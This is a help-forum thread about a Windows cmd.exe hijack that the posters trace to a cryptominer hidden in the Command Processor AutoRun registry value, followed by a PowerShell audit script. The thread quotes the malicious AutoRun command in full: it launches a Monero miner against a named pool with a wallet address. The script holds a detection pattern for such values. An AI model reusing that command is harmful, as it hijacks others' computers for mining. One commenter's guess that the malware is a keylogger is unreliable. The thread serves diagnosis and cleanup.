
By this evening, I was able to use CMD just fine. However, just now, whenever I try to access CMD I see the following error.

Error Image

Before this error, the window would just open up and close and spawn a process named SoundMixer.exe in Task Manager. So, I went ahead and deleted it since it was probably a virus. Any help as to how I can fix this would be greatly appreciated as soon as possible.

Asym
  • When you say you're "accessing CMD", how exactly are you accessing it and how exactly is it failing? Does it open? When it opens, what command are you running to get the error that you're getting? – Hashim Aziz Aug 31 '17 at 21:17
  • I can't even get it to open. I've tried opening it using the cmd search in start menu as well as opening it from C:\Windows\System32\cmd.exe . I have attached the error image also. Link in the post. – Asym Aug 31 '17 at 21:18
  • PS: After I click OK on that message. Windows explorer opens up. – Asym Aug 31 '17 at 21:19
  • So you're saying that the moment you click on CMD, either from the Start Menu or System32, that error message pops up? – Hashim Aziz Aug 31 '17 at 21:21
  • Yes exactly.... – Asym Aug 31 '17 at 21:21
  • Searching SoundMixer.exe does bring up lots of talk of viruses, it's very likely that it is one. Go to System Restore and see if you have any restore points from before this problem was taking place. If you do, restore to them and determine whether that fixes the problem. – Hashim Aziz Aug 31 '17 at 21:24
  • I don't have any restore points in system restore. And I would really like to start it up asap :( – Asym Aug 31 '17 at 21:26
  • I don't understand. You say that earlier today you were able to use CMD just fine. Then you say “Before this error, the window would just open up and close and spawn a process named SoundMixer.exe in Task Manager.” Are you saying that this is what happened when you ran CMD *before* you deleted `SoundMixer.exe` and (not surprisingly) started getting an error message about `SoundMixer.exe` not found? That is not normal behavior for when you run CMD! What are you saying? – G-Man Says 'Reinstate Monica' Aug 31 '17 at 21:30
  • Make an empty SoundMixer.exe file at the specified location. It should try to start it, fail, print an error, and give you the control back. Also, does powershell do this as well? – doriclazar Aug 31 '17 at 21:34
  • @G-Man CMD was working BEFORE. Then, strangely, it stopped working. When I opened cmd it opened and closed instantly (opening SoundMixer.exe process). So I deleted that process and I still can't get it to work. (Hence, the error message) – Asym Aug 31 '17 at 21:39
  • If you actually have been hit by a virus, that won't be possible, and your best bet right now is to do everything you can to get to the point where your system wasn't compromised. Were you running an antivirus at the time? If you have one, run a scan in your antivirus. In addition, download [Malwarebytes](https://www.malwarebytes.com/mwb-download/) and run a scan in it. – Hashim Aziz Aug 31 '17 at 21:39
  • @doriclazar I did what you said. Created an empty exe file and I get the error "SoundMixer.exe is not a valid win32 application" – Asym Aug 31 '17 at 21:40
  • A virus may have installed a start-up command file - see [this answer](https://stackoverflow.com/a/17405182/5164855). Check if your registry has HKCU\Software\Microsoft\Command Processor\AutoRun and delete the entry or replace the target file if so. – AFH Aug 31 '17 at 21:41
  • @AFH Thanks a lot man! I found the root of the cause. The AutoRun field points to something like this: `@mode 15,1 & start /MIN "" "C:\Users\Asim\AppData\Roaming\Microsoft\SoundMixer\SoundMixer.exe" -a cryptonight -o stratum+tcp://pool.minexmr.com:80 -u 4AQLzBQYq7nHAhtwjXb2XZZikWknhqxzmAgNvRkPrKW3Kp7nn3XrkaHh22L8r8B6s2ezjPtye76YqQoFqdeJTxvqGQWRoBy+10000 -p x -k -t 1 -B & explorer.exe & exit` – Asym Aug 31 '17 at 21:44
  • Wow, nice catch on @AFH's part. Definitely a virus. It's hijacking CMD to launch SoundMixer.exe, which seems to be some sort of malware for sending data back to a TCP address. Keylogger, perhaps? – Hashim Aziz Aug 31 '17 at 21:51
  • Obviously, delete the key and see if you can now run CMD. Then run the virus scans that I suggested. – Hashim Aziz Aug 31 '17 at 21:52
  • @AFH So, I changed the SoundMixer.exe to cmd.exe (without changing anything else, unfortunately) and ran cmd.exe, and it started opening Windows Explorer infinitely. So I powered off and turned on again but now my PC is unusable since it starts opening infinite explorer.exe at startup. Even in safe mode. I'm writing this from my phone right now... – Asym Aug 31 '17 at 21:53
  • Thanks a lot everyone for your support. I changed the value of that field to empty and the problem went away. Especially AFH and definitely going to run those scans @hashim. Thanks once again :) – Asym Aug 31 '17 at 22:09
  • How did you manage to change it if you couldn't get into safe mode? – Hashim Aziz Aug 31 '17 at 22:10
  • Somehow I opened task manager and terminated cmd.exe process. Then I opened regedit and changed the value. – Asym Aug 31 '17 at 22:11
  • Glad that my instincts were correct, and you've solved it, at least as far as removing the immediate problem. You now have the possibly bigger task of eradicating the virus. You may have been able to log in as another account to solve it, but equally all your accounts could have been compromised, and you should check the equivalent setting on all of them. – AFH Aug 31 '17 at 23:24
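
The check discussed in the comments above, extended to the machine-wide key and to every loaded user hive, as an added example that is not part of the original thread. The heuristic pattern, the `-Clear` switch and the backup file name are assumptions made for this sketch; the registry locations are the standard `Command Processor` keys.

```powershell
# Added example: audit the cmd.exe AutoRun value wherever cmd.exe can pick it up.
# Read-only unless -Clear is passed. Run it from PowerShell, which does not
# process this value; "cmd.exe /d" also starts a prompt with AutoRun disabled.
param([switch]$Clear)

$sub = 'Software\Microsoft\Command Processor'

# Machine-wide key, plus the 32-bit registry view on 64-bit Windows.
$paths = @(
    "Registry::HKEY_LOCAL_MACHINE\$sub",
    "Registry::HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Command Processor"
)

# Per-user key for every loaded account hive (S-1-5-21-*, skipping *_Classes).
$paths += @(Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' } |
    ForEach-Object { "Registry::HKEY_USERS\$($_.PSChildName)\$sub" })

$findings = @(foreach ($p in $paths) {
    if (-not (Test-Path -LiteralPath $p)) { continue }
    $value = (Get-ItemProperty -LiteralPath $p -Name AutoRun -ErrorAction SilentlyContinue).AutoRun
    if ([string]::IsNullOrWhiteSpace($value)) { continue }
    [pscustomobject]@{
        Key        = $p
        AutoRun    = $value
        # Assumed heuristic, based on the value quoted in this thread: it
        # launches a program from AppData, names a pool URL, then exits the shell.
        Suspicious = $value -match '\bstart\b|\bexit\b|\\AppData\\|stratum\+tcp'
    }
})

$findings | Format-List

if ($Clear) {
    foreach ($f in $findings | Where-Object { $_.Suspicious }) {
        # Keep a copy of the value for later analysis before removing it.
        Add-Content -Path "$env:TEMP\cmd-autorun-backup.txt" -Value "$($f.Key)`t$($f.AutoRun)"
        Remove-ItemProperty -LiteralPath $f.Key -Name AutoRun
    }
}
```

Hives of accounts that are not logged on are not loaded under `HKEY_USERS`, so run the check again while signed in as each of those accounts; changing the `HKEY_LOCAL_MACHINE` value requires an elevated session.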
